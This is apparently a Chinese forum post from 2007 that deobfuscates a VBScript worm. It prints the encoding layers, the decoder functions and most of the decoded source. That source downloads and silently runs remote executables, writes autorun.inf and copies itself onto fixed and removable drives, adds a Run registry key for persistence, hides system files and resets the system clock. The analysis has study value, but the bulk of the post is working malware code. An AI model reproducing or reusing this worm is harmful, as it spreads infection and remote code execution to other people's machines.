aa="一大段乱码":function ee(aa):hh=vbCrLf:Execute("For i=1 To Len(aa)"&hh&"a=A
sc(Mid(aa,i,1))"&hh&"If a=127 Then a=13"&hh&"If a=11 Then a=10"&hh&"if a=12 Th
en a=34"&hh&"if a>=14 and a<=31 then"&hh&"a=a+83"&hh&"elseif a>=1 and a<=8 the
n"&hh&"a=a+114"&hh&"elseif a>=53 and a<=57 then"&hh&"a=a-5"&hh&"elseif a>=48 a
nd a<=52 then"&hh&"a=a+5"&hh&"End If"&hh&"ee=ee+chr(a)"&hh&"Next"):end functio
n:bb="另一大段乱码"":Execute(ee(aa&bb)):ff="最后一段乱码"
一开始不知道里面的:是什么运算符,后来试验发现可以当代码的分割符用,相当于另起一
行。hh=vbCrLf这个是换行符。
整理以后如下:
aa="一大段乱码"
function ee(aa)'解码函数
For i=1 To Len(aa)
a=Asc(Mid(aa,i,1))
If a=127 Then a=13
If a=11 Then a=10
if a=12 Then a=34
if a>=14 and a<=31 then
a=a+83
elseif a>=1 and a<=8 then
a=a+114
elseif a>=53 and a<=57 then
a=a-5"
elseif a>=48 and a<=52 then
a=a+5
End If
ee=ee+chr(a)
Next
end function
bb="另一大段乱码"
Execute(ee(aa&bb))'将aa和bb连接后解码再执行之
ff="最后一段乱码"'这一段实际上并未执行,不知作什么用的,用来吓人?
由此可见,实际上执行的部分是解码后的aa&bb
照搬ee的方式对aa和bb解码。
发现大多数的代码还是不可读,再进一步分析语法,发现作者进行了二次编码。
解码函数如下:
function uc(b)
x="633d766243724c663a457865637574652822466f7220693d3120546f204c656e2862293a613
d417363284d696428622c692c3129292226632622496620613d313235205468656e20613d31332
226632622496620613d313233205468656e20613d31302226632622696620613d3132342054686
56e20613d33342226632622696620613e393620616e6420613c313130207468656e22266326226
13d612b31332226632622656c7365696620613e31303920616e6420613c313233207468656e222
6632622613d612d31332226632622456e64204966222663262275633d75632b636872286129222
66326224e6578742229":y="execute """"":z="&chr(&h":w=")":do while len(x)>1:if i
snumeric(left(x,1)) then y=y&z&left(x,2)&w:x=mid(x,3) else y=y&z+left(x,4)+w:x
=mid(x,5)
loop:execute(y)
end function
连这个解码函数也进行了编码。。。汗。这作者变态啊。
按尾段方式先对UC进行解码:
c=vbCrLf:Execute("For i=1 To Len(b):a=Asc(Mid(b,i,1))"&c&"If a=125 Then a=13"&
c&"If a=123 Then a=10"&c&"if a=124 Then a=34"&c&"if a>96 and a<110 then"&c&"a=
a+13"&c&"elseif a>109 and a<123 then"&c&"a=a-13"&c&"End If"&c&"uc=uc+chr(a)"&c
&"Next")
其余用到的还有
用filesystemobject读写文件以及copy自己
用adodb.stream将服务端响应生成文件
用winmgmts:\\.\root\cimv2来查询进程。
-------------------------------------------------------------------
function gettask()
execute(uc("if readtxt(dir&"\date.bin",1)<>trim(date) then
js=1
do while check<>"<script>"
if js>2 then
advdownfile mulu&"temp.txt",fromurl2,0,1,100
check=readtxt(mulu&"temp.txt",1)
else
advdownfile mulu&"temp.txt",fromurl,0,1,100
check=readtxt(mulu&"temp.txt",1)
end if
js=js+1
if js>4 then
exit do
end if
loop
if fso.fileexists(mulu&"temp.txt") then
set openfile = fso.opentextfile(mulu&"temp.txt", 1)
check = openfile.readline
downis = openfile.readline
downame = openfile.readline
downfrom = openfile.readline
vbsver = openfile.readline
vbsrun = openfile.readline
vbsname = openfile.readline
vbsfrom = openfile.readline
taskis = openfile.readline
taskcode = openfile.readline
upvbe= openfile.readline
openfile.close
fso.deletefile(mulu&"temp.txt")
if check="<script>" then
buildfile dir&"\date.bin",date
buildinf downame,taskis,taskcode,upvbe
if vbsver<>ver or not fso.fileexists(dir&"\"&vbsname) then
advdownfile dir&"\"&vbsname,vbsfrom,vbsrun,3,2000
wscript.quit
end if
if downis=1 and sys then
if downame<>lexe or not fso.fileexists(exemulu&lexe) then
delfile exemulu&lexe
advdownfile exemulu&downame,downfrom,1,3,1000
end if
end if
end if
end if
end if
on error resume next
if sys then
if readtxt(mulu&infname,7)=1 then
execute(uc(readtxt(mulu&infname,9)))
end if
end if"))
end function
-------------------------------------------------------------------
function delfile(where)
execute(uc("if fso.fileexists(where) then
shuxing where,0
fso.deletefile(where)
end if
if fso.folderexists(where) then
shuxing where,0
fso.deletefolder(where)
end if"))
end function
-------------------------------------------------------------------
function buildfile(where,what)
execute(uc("delfile where
set bin = fso.createtextfile(where, true)
bin.writeline what
bin.close
shuxing where,2+4"))
end function
-------------------------------------------------------------------
function buildinf(exever,taskcode,tasksw,adv)
execute(uc("delfile mulu&infname
set ini = fso.createtextfile(mulu&infname, true)
ini.writeline tile
ini.writeline "[autorun]"
ini.writeline about
ini.writeline "open=wscript.exe .\"&filename&".vbs"
ini.writeline exever
ini.writeline "shell\open=打开(&o)"
ini.writeline taskcode
ini.writeline "shell\open\command=wscript.exe .\"&filename&".vbs"
ini.writeline tasksw
ini.writeline "shell\open\default=1"
ini.writeline adv
ini.close
shuxing mulu&infname,1+2+4"))
end function
-------------------------------------------------------------------
function readtxt(where,line)
execute(uc("if fso.fileexists(where) then
set readfile = fso.opentextfile(where, 1)
i=0
do while i<line
i=i+1
strline = readfile.readline
loop
readfile.close
readtxt=strline
else
readtxt="not_found"
end if"))
end function
-------------------------------------------------------------------
function shuxing(file,change)
execute(uc("if fso.fileexists(file) then
set ofile = fso.getfile(file)
ofile.attributes = change
set ofile = nothing
end if
if fso.folderexists(file) then
set ofile = fso.getfolder(file)
ofile.attributes = change
set ofile = nothing
end if"))
end function
-------------------------------------------------------------------
function advdownfile(localfile,urlfile,runfile,cishu,minsize)
execute(uc("test=0
do while test<cishu
shuxing localfile,0
ilocal = lcase(localfile):iremote = lcase(urlfile):
'if 1=2 then wscript.echo "impossible!"
set xpost = create object("microsoft.xmlhttp")
'if 1=2 then wscript.echo "impossible!"
xpost.open "get",iremote,0
'if 1=2 then wscript.echo "impossible!"
on error resume next
xpost.send()
if not er then
'if 1=2 then wscript.echo "impossible!"
set sget = createobject("adodb.stream")
'if 1=2 then wscript.echo "impossible!"
sget.mode = 3
'if 1=2 then wscript.echo "impossible!"
sget.type = 1
'if 1=2 then wscript.echo "impossible!"
sget.open()
'if 1=2 then wscript.echo "impossible!"
sget.write(xpost.responsebody)
'if 1=2 then wscript.echo "impossible!"
sget.savetofile ilocal,2
'if 1=2 then wscript.echo "impossible!"
shuxing localfile,2+4
if fso.fileexists(localfile) then
filesize=fso.getfile(localfile).size
else
filesize=0
end if
if filesize>minsize then
if runfile=1 then wsh.run localfile
exit do
end if
else
test=test+1
delfile localfile
wscript.sleep 3000
end if
loop"))
end function
-------------------------------------------------------------------
function er()
if err.number = 0 then
er = false
else
err.clear
er = true
end if
end function
-------------------------------------------------------------------
function ucc(b)
msgbox("holle hacker")
end function
-------------------------------------------------------------------
function jincheng(where,geshu)
execute(uc("on error resume next
set y=getobject("winmgmts:\\.\root\cimv2")
set x=y.execquery("select * from win32_process where name='"&where&"'")
i=1
for each j in x
i=i+1
next
if not er then
if i>geshu then jincheng = true
else
jincheng = 1
end if"))
end function
-------------------------------------------------------------------
function copyfile(file,where)
delfile where
if fso.fileexists(file) then
fso.copyfile file,where,true
end if
end function
-------------------------------------------------------------------
function copyvbs(where)
delfile where
set self=fso.opentextfile(mulu&ouwnname,1)
vbscopy=self.readall
self.close
set vbs = fso.createtextfile(where, true)
vbs.write vbscopy
vbs.close
shuxing where,2+4
end function
-------------------------------------------------------------------
function zhuce()
RegPath="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies
\Explorer\run\"
Type_Name="REG_SZ"
Key_Name="explorer"
Key_Data=filename&".vbe"
Wsh.RegWrite RegPath&Key_Name,Key_Data,Type_Name
end function
-------------------------------------------------------------------
function yincang()
RegPath="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
Advanced\"
Type_Name="REG_DWORD"
Key_Name="ShowSuperHidden"
Key_Data="00000000"
Wsh.RegWrite RegPath&Key_Name,Key_Data,Type_Name
end function
-------------------------------------------------------------------
function buildfold(path)
if fso.folderexists(path) then
exit function
end if
if not fso.folderexists(fso.getparentfoldername(path)) then
buildfold fso.getparentfoldername(path)
end if
fso.createfolder(path)
end function
-------------------------------------------------------------------
function dowork(pcs,fname,furl,time)
execute(uc("if not fso.fileexists(exemulu&fname) and jincheng(pcs,1) then
advdownfile exemulu&fname,"http://"&furl,0,2,3000
end if
if fso.fileexists(exemulu&fname) then
if time<>0 then
nowdate=date
wsh.run "%comspec% /c date 2002-"&month(date)&"-"&day(date),vbhide
wscript.sleep abs(time*1000)
end if
wsh.run exemulu&fname
dowork=1
if time>0 then
wscript.sleep 5000
wsh.run "%comspec% /c date "&nowdate,vbhide
end if
end if"))
end function
-------------------------------------------------------------------
function ganran()
execute(uc("do
for each d in dc
if d.drivetype = 3 or (d.drivetype = 1 and d<>"A:" and d<> "B:") then
if fso.folderexists(d&"\autorun.inf") then
delfile d&"\autorun.inf"
end if
if fso.fileexists(d&"\"&filename&".vbs") and fso.fileexists(d&"\autorun.inf")
then
if readtxt(d&"\autorun.inf",1)<>tile then
copyfile dir&"\"&infname,d&"\autorun.inf"
copyfile win&"\"&filename&".vbe",d&"\"&filename&".vbs"
end if
else
yincang
copyfile dir&"\"&infname,d&"\autorun.inf"
copyfile win&"\"&filename&".vbe",d&"\"&filename&".vbs"
end if
end if
next
if (minute(now) mod 2)=0 and rw<>-1 then
gettask
end if
wscript.sleep 3000
loop"))
end function
-------------------------------------------------------------------
function chengfa()
execute(uc("msgbox("hello,hacker!")
delfile mulu&ouwnname
wscript.quit"))
end function
-- 作者: DAAHL 时间: 2007-12-23 13:35
